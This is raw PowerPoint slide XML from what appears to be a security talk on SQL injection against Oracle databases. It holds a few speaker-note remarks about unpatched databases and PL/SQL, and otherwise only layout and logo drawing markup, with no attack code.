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752013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52022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d52022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DBDA-EA3A-4CE5-B8E7-CDB27BCFA0B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acl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QL Injection on Oracle D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jection techniq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chan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vilege esca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nneling through Ora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c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rry there is no big one in this tal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N°1… yeah like microsoft on the operating system part…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You all know what happened when you’re popular in security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ll know peoples are using software the “RIGHT” way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pers are doing unit testing, calling the right meth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sadmins separate priviledges, read their log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dba’s are trying to keep their sanity … (I wish them gooood luck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ut of ten never patch, because they don’t want to break custom (unsafe) pl/sql c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compatibility with other stuffs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l/sql is often (very often) teached in university, very popular among teachers… not student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(ask: who have learned pl/sql in this room ? Ask raising a hand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 think you wouldn’t imagine how much stuff you can do with pl/sql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Java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 lot of standard java libs accessi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ecurity policies works in theory, but in practice, like any system, you need time and a good understanding of your system, and the threa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ts hard to minimize priviledges, its a full time job, but good DBA are rare, specially those who know how to secure a database, because they already have a lot to do with the day to day maintainance, performance issues etc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irect access to the listener are protected by ip based acl, but it’s still vulnerable throug sql injection :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E3D6B-057C-4428-8ADF-5B581EE86D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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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815840" y="6378840"/>
            <a:ext cx="61182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C7B59-506D-4A29-9E5F-CADEBC84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15840" y="4677840"/>
            <a:ext cx="61182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52022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15840" y="5908680"/>
            <a:ext cx="29854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1080" y="5908680"/>
            <a:ext cx="29854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815840" y="6378840"/>
            <a:ext cx="29854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1080" y="6378840"/>
            <a:ext cx="29854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29BB9-3BE8-4A8F-B977-CA591F7B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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="196992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84760" y="5908680"/>
            <a:ext cx="196992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53320" y="5908680"/>
            <a:ext cx="196992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815840" y="6378840"/>
            <a:ext cx="196992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84760" y="6378840"/>
            <a:ext cx="196992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53320" y="6378840"/>
            <a:ext cx="196992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0EA7B-FB7E-428E-8D29-04DE340EF1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1233-BD03-469A-BA9F-6635613902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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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4835-FAA2-40B6-81E9-388419A9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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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A693-6098-427A-9C08-2DF5EADB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15840" y="4677840"/>
            <a:ext cx="61182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52022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15840" y="5908680"/>
            <a:ext cx="298548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51080" y="5908680"/>
            <a:ext cx="298548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4C74-13B0-47FE-866C-53C5D6D3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15840" y="4677840"/>
            <a:ext cx="61182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5202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21FA-0431-4DC5-8462-C278FC7A3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815840" y="4677840"/>
            <a:ext cx="61182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2B08-AAB6-40C5-96A4-13818FD5B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15840" y="4677840"/>
            <a:ext cx="61182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52022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15840" y="5908680"/>
            <a:ext cx="29854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51080" y="5908680"/>
            <a:ext cx="298548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815840" y="6378840"/>
            <a:ext cx="29854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602D-36C3-41CA-BDD1-9D061530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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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9A099-2B27-4C8E-81BF-C42193D4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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="298548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51080" y="5908680"/>
            <a:ext cx="29854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51080" y="6378840"/>
            <a:ext cx="29854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8B3F-6B52-47F9-81B1-7E33B269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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="29854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51080" y="5908680"/>
            <a:ext cx="29854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815840" y="6378840"/>
            <a:ext cx="61182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3BD8-C6F9-46A8-B8CC-29389407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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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815840" y="6378840"/>
            <a:ext cx="61182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FF0A-A0C6-4419-B3D6-0D792CEC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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="29854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1080" y="5908680"/>
            <a:ext cx="29854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815840" y="6378840"/>
            <a:ext cx="29854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51080" y="6378840"/>
            <a:ext cx="29854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99FD-196D-4F51-B1C1-2557775B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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="196992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884760" y="5908680"/>
            <a:ext cx="196992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53320" y="5908680"/>
            <a:ext cx="196992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815840" y="6378840"/>
            <a:ext cx="196992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884760" y="6378840"/>
            <a:ext cx="196992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53320" y="6378840"/>
            <a:ext cx="196992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CA7F-E8D4-47DA-BD48-7A089E7ECB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098F5-9827-400C-9400-EFF230AB76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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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4CFE1-512A-43F8-A50B-8D65DB55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815840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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019FD-9A58-48A7-B037-ADF9B751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815840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="298548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51080" y="5908680"/>
            <a:ext cx="298548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69D29-0DED-4F87-91FA-557B0C9C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15840" y="4677840"/>
            <a:ext cx="61182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5202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75EFC-6728-4404-B724-CCDC16594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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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5E74F-8E45-4658-A0CB-39F018ED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815840" y="4677840"/>
            <a:ext cx="61182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A53BF-C227-4051-948F-D737004F9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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="29854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1080" y="5908680"/>
            <a:ext cx="298548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815840" y="6378840"/>
            <a:ext cx="29854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5A0A78-12DE-4AAD-B679-FD2096BD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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="298548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951080" y="5908680"/>
            <a:ext cx="29854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951080" y="6378840"/>
            <a:ext cx="29854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3C170-BE0E-4EAF-A741-FFF1F560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815840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="29854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951080" y="5908680"/>
            <a:ext cx="29854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815840" y="6378840"/>
            <a:ext cx="61182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46E5EC-38FB-48CE-9EE8-49C05A0D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815840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="61182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1815840" y="6378840"/>
            <a:ext cx="61182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46ED0-5DFB-41A1-B5B9-9EBA3D29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815840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="29854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951080" y="5908680"/>
            <a:ext cx="29854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815840" y="6378840"/>
            <a:ext cx="29854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951080" y="6378840"/>
            <a:ext cx="29854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C73CE-F211-409B-B67A-51C16248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815840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="196992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884760" y="5908680"/>
            <a:ext cx="196992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953320" y="5908680"/>
            <a:ext cx="196992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1815840" y="6378840"/>
            <a:ext cx="196992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884760" y="6378840"/>
            <a:ext cx="196992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953320" y="6378840"/>
            <a:ext cx="196992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A9078-9CD9-4325-82D4-F481729887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15840" y="4677840"/>
            <a:ext cx="61182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52022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15840" y="5908680"/>
            <a:ext cx="298548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1080" y="5908680"/>
            <a:ext cx="298548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89903-D562-40BC-A6C9-1468361E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15840" y="4677840"/>
            <a:ext cx="61182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5202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9D332-6E85-45BE-959D-8348F3D33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815840" y="4677840"/>
            <a:ext cx="61182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B3C8B-E0F9-47D5-9495-EB00C1440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15840" y="4677840"/>
            <a:ext cx="61182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52022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15840" y="5908680"/>
            <a:ext cx="29854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1080" y="5908680"/>
            <a:ext cx="298548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815840" y="6378840"/>
            <a:ext cx="29854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BB061-BEFC-478B-A0DB-65BB72B8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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="298548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1080" y="5908680"/>
            <a:ext cx="29854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1080" y="6378840"/>
            <a:ext cx="29854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13B6E-A986-41EE-B6E2-CC42C4ED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15840" y="4677840"/>
            <a:ext cx="61182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52022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815840" y="5908680"/>
            <a:ext cx="29854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1080" y="5908680"/>
            <a:ext cx="29854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815840" y="6378840"/>
            <a:ext cx="61182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156A9-E8E9-400C-BD2F-14478A57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0" y="6895800"/>
            <a:ext cx="8859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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS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A3A5-BC93-4756-8024-094BCC045FAF}" type="datetime">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="757575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea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5369040"/>
            <a:ext cx="336600" cy="1946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76200" y="1450800"/>
            <a:ext cx="71978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5202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d52022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279440" y="6040440"/>
            <a:ext cx="71978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1000"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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="5544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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="111240" algn="ctr">
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="b8b9bb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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="507240" indent="-7056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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="637560" indent="-7056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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="637560" indent="-7056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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="6" marL="637560" indent="-7056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48587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848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 10" descr="T:\KEREVAL\Qualité\Kit Media Kereval\07_diaporama\V2\Fond_diapo_coin_droit.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9388440" y="0"/>
            <a:ext cx="365040" cy="1895400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name=""/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="358920" y="287280"/>
            <a:ext cx="2158920" cy="1036800"/>
            <a:chOff x="358920" y="287280"/>
            <a:chExt cx="2158920" cy="1036800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name=""/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1424520" y="420120"/>
              <a:ext cx="766080" cy="554400"/>
              <a:chOff x="1424520" y="420120"/>
              <a:chExt cx="766080" cy="554400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1424520" y="578520"/>
                <a:ext cx="315720" cy="391680"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4353" h="5451">
                    <a:moveTo>
                      <a:pt x="4030" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3992" y="0"/>
                      <a:pt x="3937" y="5"/>
                      <a:pt x="3894" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3817" y="60"/>
                      <a:pt x="3765" y="125"/>
                      <a:pt x="3731" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3717" y="204"/>
                      <a:pt x="3647" y="335"/>
                      <a:pt x="3604" y="445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3183" y="1488"/>
                      <a:pt x="2239" y="3897"/>
                      <a:pt x="2239" y="3897"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2181" y="4040"/>
                      <a:pt x="2126" y="4117"/>
                      <a:pt x="2078" y="4117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2033" y="4119"/>
                      <a:pt x="1976" y="4038"/>
                      <a:pt x="1911" y="3870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1705" y="3339"/>
                      <a:pt x="521" y="426"/>
                      <a:pt x="521" y="426"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1744" y="5116"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1849" y="5365"/>
                      <a:pt x="2248" y="5451"/>
                      <a:pt x="2382" y="5126"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4190" y="778"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4190" y="778"/>
                      <a:pt x="4348" y="440"/>
                      <a:pt x="4351" y="326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4353" y="161"/>
                      <a:pt x="4293" y="103"/>
                      <a:pt x="4229" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4164" y="15"/>
                      <a:pt x="4092" y="3"/>
                      <a:pt x="4030" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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2013480" y="583200"/>
                <a:ext cx="177120" cy="391320"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2442" h="5446">
                    <a:moveTo>
                      <a:pt x="327" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="0"/>
                      <a:pt x="0" y="163"/>
                      <a:pt x="0" y="361"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3944"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3944"/>
                      <a:pt x="9" y="4111"/>
                      <a:pt x="14" y="4150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="5446"/>
                      <a:pt x="1313" y="5276"/>
                      <a:pt x="1480" y="5245"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2164" y="5245"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2317" y="5245"/>
                      <a:pt x="2442" y="5066"/>
                      <a:pt x="2442" y="4841"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2442" y="4618"/>
                      <a:pt x="2317" y="4437"/>
                      <a:pt x="2164" y="4437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2164" y="4437"/>
                      <a:pt x="1492" y="4434"/>
                      <a:pt x="1463" y="4434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="4446"/>
                      <a:pt x="655" y="4001"/>
                      <a:pt x="655" y="3944"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="655" y="361"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="163"/>
                      <a:pt x="509" y="0"/>
                      <a:pt x="327" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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785600" y="420120"/>
                <a:ext cx="106200" cy="108720"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1466" h="1516">
                    <a:moveTo>
                      <a:pt x="0" y="777"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="533"/>
                      <a:pt x="69" y="344"/>
                      <a:pt x="206" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="67"/>
                      <a:pt x="519" y="0"/>
                      <a:pt x="734" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="875" y="0"/>
                      <a:pt x="1002" y="31"/>
                      <a:pt x="1117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="160"/>
                      <a:pt x="1318" y="251"/>
                      <a:pt x="1375" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1435" y="483"/>
                      <a:pt x="1466" y="614"/>
                      <a:pt x="1466" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1466" y="908"/>
                      <a:pt x="1435" y="1042"/>
                      <a:pt x="1373" y="1160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1308" y="1277"/>
                      <a:pt x="1220" y="1365"/>
                      <a:pt x="1105" y="1427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="990" y="1487"/>
                      <a:pt x="866" y="1516"/>
                      <a:pt x="732" y="1516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="588" y="1516"/>
                      <a:pt x="459" y="1483"/>
                      <a:pt x="347" y="1418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="1351"/>
                      <a:pt x="146" y="1260"/>
                      <a:pt x="88" y="1143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="1028"/>
                      <a:pt x="0" y="906"/>
                      <a:pt x="0" y="777"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="779"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="210" y="956"/>
                      <a:pt x="258" y="1097"/>
                      <a:pt x="359" y="1198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="457" y="1301"/>
                      <a:pt x="581" y="1351"/>
                      <a:pt x="732" y="1351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="885" y="1351"/>
                      <a:pt x="1009" y="1301"/>
                      <a:pt x="1110" y="1198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1208" y="1095"/>
                      <a:pt x="1256" y="949"/>
                      <a:pt x="1256" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1256" y="641"/>
                      <a:pt x="1234" y="535"/>
                      <a:pt x="1193" y="447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1150" y="358"/>
                      <a:pt x="1088" y="289"/>
                      <a:pt x="1007" y="239"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="191"/>
                      <a:pt x="837" y="165"/>
                      <a:pt x="734" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="591" y="165"/>
                      <a:pt x="469" y="212"/>
                      <a:pt x="364" y="308"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261" y="401"/>
                      <a:pt x="210" y="559"/>
                      <a:pt x="210" y="779"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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666080" y="579600"/>
                <a:ext cx="333720" cy="386280"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4602" h="5376">
                    <a:moveTo>
                      <a:pt x="2313" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2100" y="0"/>
                      <a:pt x="2014" y="158"/>
                      <a:pt x="1990" y="215"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="50" y="4903"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5049"/>
                      <a:pt x="72" y="5264"/>
                      <a:pt x="239" y="5338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="5376"/>
                      <a:pt x="457" y="5369"/>
                      <a:pt x="550" y="5307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="565" y="5295"/>
                      <a:pt x="639" y="5240"/>
                      <a:pt x="682" y="5135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="742" y="4996"/>
                      <a:pt x="2004" y="1896"/>
                      <a:pt x="2177" y="1437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2255" y="1224"/>
                      <a:pt x="2368" y="1243"/>
                      <a:pt x="2432" y="1440"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2449" y="1485"/>
                      <a:pt x="3784" y="4886"/>
                      <a:pt x="3908" y="5094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4033" y="5302"/>
                      <a:pt x="4178" y="5362"/>
                      <a:pt x="4351" y="5290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4520" y="5221"/>
                      <a:pt x="4602" y="4987"/>
                      <a:pt x="4535" y="4860"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4523" y="4836"/>
                      <a:pt x="2643" y="249"/>
                      <a:pt x="2643" y="249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2629" y="213"/>
                      <a:pt x="2576" y="0"/>
                      <a:pt x="2313" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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358920" y="632160"/>
              <a:ext cx="1003320" cy="287640"/>
              <a:chOff x="358920" y="632160"/>
              <a:chExt cx="1003320" cy="287640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1128960" y="633600"/>
                <a:ext cx="233280" cy="279360"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3215" h="3889">
                    <a:moveTo>
                      <a:pt x="1170" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="10"/>
                      <a:pt x="335" y="170"/>
                      <a:pt x="139" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="636"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="990"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3262"/>
                      <a:pt x="141" y="3521"/>
                      <a:pt x="421" y="3693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="3825"/>
                      <a:pt x="897" y="3889"/>
                      <a:pt x="1170" y="3889"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3033" y="3889"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3155" y="3889"/>
                      <a:pt x="3215" y="3779"/>
                      <a:pt x="3215" y="3557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3215" y="3389"/>
                      <a:pt x="3155" y="3306"/>
                      <a:pt x="3033" y="3306"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1194" y="3306"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="749" y="3306"/>
                      <a:pt x="524" y="3169"/>
                      <a:pt x="524" y="2894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="524" y="2366"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="2366"/>
                      <a:pt x="529" y="2275"/>
                      <a:pt x="605" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="622" y="2251"/>
                      <a:pt x="3033" y="2256"/>
                      <a:pt x="3033" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3162" y="2256"/>
                      <a:pt x="3212" y="2153"/>
                      <a:pt x="3212" y="1945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3212" y="1763"/>
                      <a:pt x="3162" y="1672"/>
                      <a:pt x="3033" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3033" y="1672"/>
                      <a:pt x="648" y="1672"/>
                      <a:pt x="641" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="548" y="1670"/>
                      <a:pt x="519" y="1598"/>
                      <a:pt x="519" y="1572"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="519" y="990"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="519" y="751"/>
                      <a:pt x="770" y="603"/>
                      <a:pt x="1129" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1172" y="574"/>
                      <a:pt x="2851" y="577"/>
                      <a:pt x="2851" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3040" y="577"/>
                      <a:pt x="3191" y="447"/>
                      <a:pt x="3191" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3191" y="129"/>
                      <a:pt x="3040" y="0"/>
                      <a:pt x="2851" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1722" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1722" y="0"/>
                      <a:pt x="1172" y="0"/>
                      <a:pt x="1170" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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03720" y="633600"/>
                <a:ext cx="232920" cy="279360"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3214" h="3889">
                    <a:moveTo>
                      <a:pt x="1167" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="677" y="10"/>
                      <a:pt x="332" y="170"/>
                      <a:pt x="138" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="636"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="990"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3262"/>
                      <a:pt x="141" y="3521"/>
                      <a:pt x="421" y="3693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="3825"/>
                      <a:pt x="894" y="3889"/>
                      <a:pt x="1167" y="3889"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3030" y="3889"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3152" y="3889"/>
                      <a:pt x="3214" y="3779"/>
                      <a:pt x="3214" y="3557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3214" y="3389"/>
                      <a:pt x="3152" y="3306"/>
                      <a:pt x="3030" y="3306"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1193" y="3306"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="746" y="3306"/>
                      <a:pt x="524" y="3169"/>
                      <a:pt x="524" y="2894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="524" y="2366"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="2366"/>
                      <a:pt x="526" y="2275"/>
                      <a:pt x="602" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="2251"/>
                      <a:pt x="3030" y="2256"/>
                      <a:pt x="3030" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3159" y="2256"/>
                      <a:pt x="3212" y="2153"/>
                      <a:pt x="3212" y="1945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3212" y="1763"/>
                      <a:pt x="3159" y="1672"/>
                      <a:pt x="3032" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3032" y="1672"/>
                      <a:pt x="648" y="1672"/>
                      <a:pt x="638" y="1672"/>
                    </a:cubicBezTo>
